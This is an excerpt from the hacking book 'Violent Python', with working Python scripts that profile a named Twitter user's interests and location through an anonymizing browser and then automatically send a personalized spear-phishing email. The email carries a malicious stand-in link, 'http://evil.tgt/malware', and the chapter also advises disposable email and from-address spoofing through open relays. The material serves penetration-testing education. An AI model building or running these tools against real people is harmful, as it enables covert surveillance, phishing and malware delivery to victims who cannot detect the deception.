Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers

Parsing Interests from Twitter Using Regular Expressions

Next we will gather a target’s interests, whether those interests are other users or Internet content. Any time a website presents an opportunity to learn what a target cares about, jump at it, as that data will form the basis of a successful social-engineering attack. As discussed earlier, the points of interest in a tweet are any links included, hashtags, and other Twitter users mentioned. Finding this information will be a simple exercise in regular expressions.

 import json
 import re
 import urllib
 import urllib2
 import optparse
 from anonBrowser import *

 def get_tweets(handle):
     # Search for tweets from the handle since 2009, retweets included
     query = urllib.quote_plus('from:' + handle +
                               ' since:2009-01-01 include:retweets')
     tweets = []
     browser = anonBrowser()
     browser.anonymize()
     response = browser.open('http://search.twitter.com/' +
                             'search.json?q=' + query)
     json_objects = json.load(response)
     # Keep only the fields the later steps need
     for result in json_objects['results']:
         new_result = {}
         new_result['from_user'] = result['from_user_name']
         new_result['geo'] = result['geo']
         new_result['tweet'] = result['text']
         tweets.append(new_result)
     return tweets

 def find_interests(tweets):
     interests = {}
     interests['links'] = []
     interests['users'] = []
     interests['hashtags'] = []
     for tweet in tweets:
         text = tweet['tweet']
         # Grab text starting at 'http', up to the end of the tweet
         # or up to the next space
         links = re.compile(r'(http.*?)\Z|(http.*?) ').findall(text)
         for link in links:
             if link[0]:
                 link = link[0]
             elif link[1]:
                 link = link[1]
             else:
                 continue
             try:
                 # Opening the link follows redirects, so response.url
                 # holds the expanded form of a shortened URL
                 response = urllib2.urlopen(link)
                 full_link = response.url
                 interests['links'].append(full_link)
             except Exception:
                 pass
         interests['users'] += re.compile(r'(@\w+)').findall(text)
         interests['hashtags'] += re.compile(r'(#\w+)').findall(text)
     interests['users'].sort()
     interests['hashtags'].sort()
     interests['links'].sort()
     return interests

 def main():
     parser = optparse.OptionParser('usage %prog ' +
                                    '-u <twitter handle>')
     parser.add_option('-u', dest='handle', type='string',
                       help='specify twitter handle')
     (options, args) = parser.parse_args()
     handle = options.handle
     if handle is None:
         print parser.usage
         exit(0)
     tweets = get_tweets(handle)
     interests = find_interests(tweets)
     # set() drops duplicates before printing
     print '\n[+] Links.'
     for link in set(interests['links']):
         print ' [+] ' + str(link)
     print '\n[+] Users.'
     for user in set(interests['users']):
         print ' [+] ' + str(user)
     print '\n[+] HashTags.'
     for hashtag in set(interests['hashtags']):
         print ' [+] ' + str(hashtag)

 if __name__ == '__main__':
     main()

Running our interest-parsing script, we see it parses out the links, users, and hashtags for our target, mixed martial arts fighter Chael Sonnen. Notice that it returns a YouTube video, some users, and a hashtag for an upcoming fight against current (as of June 2012) UFC Champion Anderson Silva. Curiosity again gets the best of us, wondering how that will turn out.

 recon:~# python twitterInterests.py -u sonnench

 [+] Links.
  [+] http://www.youtube.com/watch?v=K-BIuZtlC7k&feature=plcp

 [+] Users.
  [+] @tomasseeger
  [+] @sonnench
  [+] @Benaskren
  [+] @AirFrayer
  [+] @NEXERSYS

 [+] HashTags.
  [+] #UFC148

The use of regular expressions here is not the optimal method for finding information. The regular expression to grab links included in the text will miss certain types of URLs, because it is very difficult to match all possible URLs with a regular expression. However, for our purposes, this regular expression will work 99 percent of the time. Additionally, the function uses the urllib2 library to open links instead of our anonBrowser class.
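The limits of the link pattern are easy to see on a sample string. The following sketch is written for Python 3 (the listings in this chapter target Python 2) and runs the pattern from the script against a made-up tweet containing two links. For comparison it also tries a simpler pattern, a scheme followed by any run of non-whitespace characters; that second pattern, the sample text, and the function names are assumptions of this example and do not come from the script.

```python
import re

# Pattern from the listing above: lazy match from "http" to the end of the
# string, or from "http" to the next space.
BOOK_LINK_RE = re.compile(r'(http.*?)\Z|(http.*?) ')

# Hypothetical alternative: a scheme followed by any run of non-whitespace.
SIMPLE_LINK_RE = re.compile(r'https?://\S+')


def book_links(text):
    """Return the non-empty capture from each match of the book's pattern."""
    return [first or second for first, second in BOOK_LINK_RE.findall(text)]


def simple_links(text):
    """Return every whitespace-delimited run that starts with http(s)://."""
    return SIMPLE_LINK_RE.findall(text)


if __name__ == '__main__':
    sample = 'watch http://t.co/abc and http://t.co/xyz'  # made-up tweet
    print(book_links(sample))
    print(simple_links(sample))
```

On this sample the script's pattern returns one string that runs from the first link to the end of the tweet, because the end-of-string alternative is tried first and the dot also matches spaces. When the only link sits at the end of a tweet, both patterns agree. The simpler pattern still keeps trailing punctuation attached to a URL, so neither one is a complete URL matcher.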

Again, we will use a dictionary to sort the information into a more manageable data structure so that we don’t have to create a whole new class. Due to Twitter’s character limit, most URLs are shortened using one of many services. These links are not very informative, because they could point anywhere. To expand them, the script opens each one with urllib2; once the page has been opened, the url attribute of the response holds the full URL. Other users and hashtags are then retrieved using very similar regular expressions, and the results are returned to the master twitter() method. The locations and interests are finally returned to the caller outside of the class.
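The dictionary of users and hashtags can be tried out without any network access. The sketch below is written for Python 3 (the chapter's listings target Python 2) and applies the same two patterns to a list of tweet dictionaries shaped like the ones get_tweets() builds. The sample tweets are made up, the name collect_interests is hypothetical, and collecting into sets to drop duplicates early is a choice made here; the script itself keeps lists and de-duplicates when printing.

```python
import re

MENTION_RE = re.compile(r'(@\w+)')   # same pattern as the listing
HASHTAG_RE = re.compile(r'(#\w+)')   # same pattern as the listing


def collect_interests(tweets):
    """Group mentions and hashtags from a list of tweet dicts.

    Each tweet is assumed to be a dict with a 'tweet' key holding the text,
    matching the shape built by get_tweets() in the listing.
    """
    interests = {'users': set(), 'hashtags': set()}
    for tweet in tweets:
        text = tweet['tweet']
        interests['users'].update(MENTION_RE.findall(text))
        interests['hashtags'].update(HASHTAG_RE.findall(text))
    # Sorted lists are easier to print and compare than sets.
    return {key: sorted(values) for key, values in interests.items()}


if __name__ == '__main__':
    sample_tweets = [  # made-up data, not real API output
        {'tweet': 'Training with @Benaskren ahead of #UFC148'},
        {'tweet': 'Thanks @NEXERSYS! #UFC148'},
    ]
    print(collect_interests(sample_tweets))
```

Note that the mention pattern matches any @ followed by word characters, so an email address in a tweet would also contribute a match for the part after the @ sign.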

Other things can be done to expand the capabilities of our methods of handling Twitter. The virtually limitless resources found on the Internet and the myriad ways to analyze that data require the constant expansion of capabilities in automated information-gathering programs.

Wrapping up our entire series of recon against a Twitter user, we make a class to scrape location, interests, and tweets. This will prove useful, as you’ll see in the next section.

 import urllib
 from anonBrowser import *
 import json
 import re
 import urllib2

 class reconPerson:
     # Gathers tweets, interests, and location hints for one Twitter handle

     def __init__(self, handle):
         self.handle = handle
         self.tweets = self.get_tweets()

     def get_tweets(self):
         query = urllib.quote_plus('from:' + self.handle +
                                   ' since:2009-01-01 include:retweets')
         tweets = []
         browser = anonBrowser()
         browser.anonymize()
         response = browser.open('http://search.twitter.com/' +
                                 'search.json?q=' + query)
         json_objects = json.load(response)
         for result in json_objects['results']:
             new_result = {}
             new_result['from_user'] = result['from_user_name']
             new_result['geo'] = result['geo']
             new_result['tweet'] = result['text']
             tweets.append(new_result)
         return tweets

     def find_interests(self):
         interests = {}
         interests['links'] = []
         interests['users'] = []
         interests['hashtags'] = []
         for tweet in self.tweets:
             text = tweet['tweet']
             links = re.compile(r'(http.*?)\Z|(http.*?) ').findall(text)
             for link in links:
                 if link[0]:
                     link = link[0]
                 elif link[1]:
                     link = link[1]
                 else:
                     continue
                 try:
                     # response.url is the expanded form of a shortened link
                     response = urllib2.urlopen(link)
                     full_link = response.url
                     interests['links'].append(full_link)
                 except Exception:
                     pass
             interests['users'] += \
                 re.compile(r'(@\w+)').findall(text)
             interests['hashtags'] += \
                 re.compile(r'(#\w+)').findall(text)
         interests['users'].sort()
         interests['hashtags'].sort()
         interests['links'].sort()
         return interests

     def twitter_locate(self, cityFile):
         # Load one lowercase city name per line from the city file
         cities = []
         if cityFile != None:
             for line in open(cityFile).readlines():
                 city = line.strip('\n').strip('\r').lower()
                 cities.append(city)
         locations = []
         locCnt = 0
         cityCnt = 0
         tweetsText = ''
         # Collect geotags and build one lowercase string of all tweet text
         for tweet in self.tweets:
             if tweet['geo'] != None:
                 locations.append(tweet['geo'])
                 locCnt += 1
             tweetsText += tweet['tweet'].lower()
         # Any city name found in the combined text counts as a location
         for city in cities:
             if city in tweetsText:
                 locations.append(city)
                 cityCnt += 1
         return locations
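The city lookup in twitter_locate() is a plain substring test, so a short city name also matches inside a longer word. A minimal Python 3 sketch of a stricter variant follows (the listing above targets Python 2). The function name find_cities, the word-boundary matching, and the sample data are assumptions made for illustration and are not part of the class.

```python
import re


def find_cities(tweets, cities):
    """Return the cities that appear as whole words in any tweet.

    `tweets` is assumed to be a list of dicts with a 'tweet' key, as built
    by get_tweets(); `cities` is a list of city names.
    """
    # Join with spaces so words from adjacent tweets do not run together.
    text = ' '.join(tweet['tweet'].lower() for tweet in tweets)
    found = []
    for city in cities:
        name = city.strip().lower()
        # \b anchors keep a short name from matching inside a longer word.
        if name and re.search(r'\b' + re.escape(name) + r'\b', text):
            found.append(name)
    return found


if __name__ == '__main__':
    sample_tweets = [  # made-up data
        {'tweet': 'Great night in Boston'},
        {'tweet': 'Heading to the bathroom'},
    ]
    print(find_cities(sample_tweets, ['Boston', 'Bath', 'Toronto']))
```

With the substring test used in the class, the name bath would be reported for the second sample tweet; the word-boundary version reports only boston.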

Anonymous Email

More and more frequently, websites require their users to create and log in to accounts if they want access to the best resources of that site. This obviously presents a problem, as browsing the Internet remains very different for our browser than for a traditional Internet user. The requirement to log in destroys the option for total anonymity on the Internet, as any action performed after logging in will be tied to the account. Most websites only require a valid email address and do not check the validity of other personal information entered. Email addresses from online providers like Google or Yahoo are free and easy to sign up for; however, they come with terms of service that you must accept and understand.

One great alternative to having a permanent email is to use a disposable email account. Ten Minute Mail, at http://10minutemail.com/10MinuteMail/index.html, provides an example of such a disposable email account. An attacker can use email accounts that are difficult to trace in order to create social media accounts that are also not tied to them. Most websites have at the very minimum a “terms of use” document that disallows the gathering of information on other users. While actual attackers do not follow these rules, applying these techniques to personal accounts demonstrates the capability fully. Remember, though, that the same process can be used against you, and you should take steps to make sure that your account is safe from such actions.

Mass Social Engineering

Up to this point, we have gathered a large amount of valuable information, accumulating a well-rounded view of the given target. Crafting an email automatically with this information can be a tricky exercise, especially with the goal of adding enough detail to make it believable. One option at this point would be to have the program present all of the information it has and then quit: this would allow the attacker to then personally craft an email using all of the available information. However, manually sending an email to each person in a large organization is infeasible. The power of Python allows us to automate the process and gain results quickly. For our purposes, we will create a very simple email using the information gathered and automatically send it to our target.

Using Smtplib to Email Targets

The process of sending an email normally involves opening one’s client of choice, clicking new, and then clicking send. Behind the scenes, the client connects to the server, possibly logs in, and exchanges information detailing the sender, recipient, and the other necessary data. The Python library, smtplib, will handle this process in our program. We will go through the process of creating a Python email client to use to send our malicious emails to our target. This client will be very basic but will make sending emails simpler for the rest of our program. For our purposes here, we’ll use the Google Gmail SMTP server; you will need to create a Google Gmail account to use this script or modify the settings to use your own SMTP server.

 import smtplib
 from email.mime.text import MIMEText

 def sendMail(user, pwd, to, subject, text):
     # Build a plain-text message with the usual headers
     msg = MIMEText(text)
     msg['From'] = user
     msg['To'] = to
     msg['Subject'] = subject
     try:
         smtpServer = smtplib.SMTP('smtp.gmail.com', 587)
         print "[+] Connecting To Mail Server."
         smtpServer.ehlo()
         print "[+] Starting Encrypted Session."
         smtpServer.starttls()
         # Re-identify to the server over the encrypted channel
         smtpServer.ehlo()
         print "[+] Logging Into Mail Server."
         smtpServer.login(user, pwd)
         print "[+] Sending Mail."
         smtpServer.sendmail(user, to, msg.as_string())
         smtpServer.close()
         print "[+] Mail Sent Successfully."
     except Exception:
         print "[-] Sending Mail Failed."

 user = 'username'
 pwd = 'password'
 sendMail(user, pwd, '[email protected]',
          'Re: Important', 'Test Message')

Running the script and checking the target’s inbox, we see it successfully sends an email using Python’s smtplib.

 recon:# python sendMail.py
 [+] Connecting To Mail Server.
 [+] Starting Encrypted Session.
 [+] Logging Into Mail Server.
 [+] Sending Mail.
 [+] Mail Sent Successfully.
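To see what sendMail() actually hands to the server, the message can be built and inspected without opening a connection. The sketch below is written for Python 3 (the listing above targets Python 2); the helper name build_message and the example.com addresses are placeholders invented for this example.

```python
from email import message_from_string
from email.mime.text import MIMEText


def build_message(sender, recipient, subject, body):
    """Build the same kind of MIMEText message that sendMail() constructs."""
    msg = MIMEText(body)
    msg['From'] = sender
    msg['To'] = recipient
    msg['Subject'] = subject
    return msg


if __name__ == '__main__':
    # Placeholder addresses on the reserved example.com domain.
    msg = build_message('sender@example.com', 'recipient@example.com',
                        'Re: Important', 'Test Message')
    raw = msg.as_string()   # the text that is passed to sendmail()
    print(raw)

    # Parsing the string back shows the headers and body survive intact.
    parsed = message_from_string(raw)
    print(parsed['Subject'], '|', parsed.get_payload())
```

The From, To, and Subject values set here are only headers inside the message text; the addresses given as the first two arguments to sendmail() are passed to the server separately.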

Given a valid email server and parameters, this client will correctly send an email to the address passed in the to argument. Many email servers, however, are not open relays, and so will only deliver mail to specific addresses. A local email server set up as an open relay, or any open relay on the Internet, will send email to any address and from any address; the from address does not even have to be valid. Spammers use this same technique to send email from [email protected]: they simply spoof the from address. As people will rarely open email from a suspicious address in this day and age, our ability to spoof the from address is key. Using this client and an open relay enables an attacker to send an email from an apparently trustworthy address, increasing the probability it will be clicked on by the target.

Spear Phishing with Smtplib

We are finally at the stage at which all of our research comes together. Here, the script creates an email that looks like it comes from the target’s friend, has things that the target will find interesting, and flows as if it was written by a real person. A great deal of research has gone into helping computers communicate as though they were people, and the various techniques are still not perfect. To work around this limitation, we will create a very simple message that contains our payload in the email. Several parts of the program will involve choosing which piece of information to include. Our program will randomly make these choices based on the data it has. The steps to take are: choose the fake sender’s email address, craft a subject, create the message body, and then send the email. Luckily, creating the sender and subject is fairly straightforward.

This code becomes a matter of carefully handling if-statements and how the sentences come together to form a short, coherent message. When dealing with the possibility of a huge amount of data, as would be the case if our reconnaissance code used more sources, each piece of the paragraph would probably be broken into individual methods. Each method would be responsible for having its piece of the pie begin and end a certain way, and then would operate independently of the rest of the code. That way, as more information about someone’s interests (for example) was learned, only that method would be changed. The last step is sending the email via our email client and then trusting human stupidity to do the rest. Part of this process, and one not discussed in this chapter, is the creation of whatever exploit or phishing site will be used to gain access. In our example, we simply send a misnamed link, but the payload could be an attachment or a scam website, or any other method an attacker desired. This process would then be repeated for every member of the organization, and it only takes one person to fall for the trap to grant access to an attacker.

Our specific script will target a user based on the information they leave publicly accessible via Twitter. Based on what it finds about locations, users, hashtags, and links, it will craft an email with a malicious link for the user to click.

 #!/usr/bin/python
 # -*- coding: utf-8 -*-
 import smtplib
 import optparse
 from email.mime.text import MIMEText
 from twitterClass import *
 from random import choice

 def sendMail(user, pwd, to, subject, text):
     msg = MIMEText(text)
     msg['From'] = user
     msg['To'] = to
     msg['Subject'] = subject
     try:
         smtpServer = smtplib.SMTP('smtp.gmail.com', 587)
         print "[+] Connecting To Mail Server."
         smtpServer.ehlo()
         print "[+] Starting Encrypted Session."
         smtpServer.starttls()
         smtpServer.ehlo()
         print "[+] Logging Into Mail Server."
         smtpServer.login(user, pwd)
         print "[+] Sending Mail."
         smtpServer.sendmail(user, to, msg.as_string())
         smtpServer.close()
         print "[+] Mail Sent Successfully."
     except Exception:
         print "[-] Sending Mail Failed."

 def main():
     parser = optparse.OptionParser('usage %prog ' +
                                    '-u <twitter handle> -t <target email> ' +
                                    '-l <gmail login> -p <gmail password>')
     parser.add_option('-u', dest='handle', type='string',
                       help='specify twitter handle')
     parser.add_option('-t', dest='tgt', type='string',
                       help='specify target email')
     parser.add_option('-l', dest='user', type='string',
                       help='specify gmail login')
     parser.add_option('-p', dest='pwd', type='string',
                       help='specify gmail password')
     (options, args) = parser.parse_args()
     handle = options.handle
     tgt = options.tgt
     user = options.user
     pwd = options.pwd
     if (handle is None or tgt is None or
             user is None or pwd is None):
         print parser.usage
         exit(0)
     print "[+] Fetching tweets from: " + str(handle)
     spamTgt = reconPerson(handle)
     spamTgt.get_tweets()
     print "[+] Fetching interests from: " + str(handle)
     interests = spamTgt.find_interests()
     print "[+] Fetching location information from: " + \
         str(handle)
     location = spamTgt.twitter_locate('mlb-cities.txt')
     # Assemble the message from whichever pieces of data were found
     spamMsg = "Dear " + tgt + ","
     if location is not None:
         randLoc = choice(location)
         spamMsg += " Its me from " + randLoc + "."
     if interests['users'] is not None:
         randUser = choice(interests['users'])
         spamMsg += " " + randUser + " said to say hello."
     if interests['hashtags'] is not None:
         randHash = choice(interests['hashtags'])
         spamMsg += " Did you see all the fuss about " + \
             randHash + "?"
     if interests['links'] is not None:
         randLink = choice(interests['links'])
         spamMsg += " I really liked your link to: " + \
             randLink + "."
     spamMsg += " Check out my link to http://evil.tgt/malware"
     print "[+] Sending Msg: " + spamMsg
     sendMail(user, pwd, tgt, 'Re: Important', spamMsg)

 if __name__ == '__main__':
     main()

Testing our script, we see if we can gain some information about the Boston Red Sox from their Twitter account in order to send a malicious spam email.

 recon# python sendSpam.py -u redsox -t target@tgt -l username -p password
 [+] Fetching tweets from: redsox
 [+] Fetching interests from: redsox
 [+] Fetching location information from: redsox
 [+] Sending Msg: Dear redsox, Its me from toronto. @davidortiz said to say hello. Did you see all the fuss about #SoxAllStars? I really liked your link to: http://mlb.mlb.com. Check out my link to http://evil.tgt/malware
 [+] Connecting To Mail Server.
 [+] Starting Encrypted Session.
 [+] Logging Into Mail Server.
 [+] Sending Mail.
 [+] Mail Sent Successfully.
